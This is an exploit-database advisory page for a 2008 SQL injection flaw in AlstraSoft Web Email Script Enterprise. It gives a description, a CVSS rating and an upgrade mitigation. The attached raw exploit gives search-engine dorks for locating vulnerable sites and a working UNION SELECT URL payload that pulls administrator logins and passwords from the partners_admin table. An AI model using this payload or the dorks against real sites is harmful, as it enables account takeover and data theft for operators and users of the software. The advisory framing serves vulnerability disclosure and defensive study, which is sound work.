AlstraSoft Web Email Script Enterprise (id) Remote SQL Injection Vuln.

vendor:

Web Email Script Enterprise

by:

Bgh7

9.3

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Web Email Script Enterprise

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:alstrasoft:web_email_script_enterprise

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

AlstraSoft Web Email Script Enterprise (id) Remote SQL Injection Vuln.

AlstraSoft Web Email Script Enterprise (id) is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Upgrade to the latest version of AlstraSoft Web Email Script Enterprise.

Source

Exploit-DB raw data:

--AlstraSoft Web Email Script Enterprise (id) Remote SQL Injection Vuln.
############################################
Yazar(Auth0r): Bgh7
 
Site: Http://ozelteam.com Turk BÄ±lÄ±sÄ±m GuclerÄ±
 
PsT: ByBgh7 [at] msn [d0t] c0m
############################################

--Script: http://www.alstrasoft.com/disposable-email-script.htm
 
--Dork: AlstraSoft Web "ESE"

--Dork2: AlstraSoft Web Email Script Enterprise
 
--Expl0it;
--http://web.xxx /Script/ index.php?Act=directory&joinstatus=awesewise&id=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin
 
#########
column_name
Ä°d
Passwd
#########

# milw0rm.com [2008-12-28]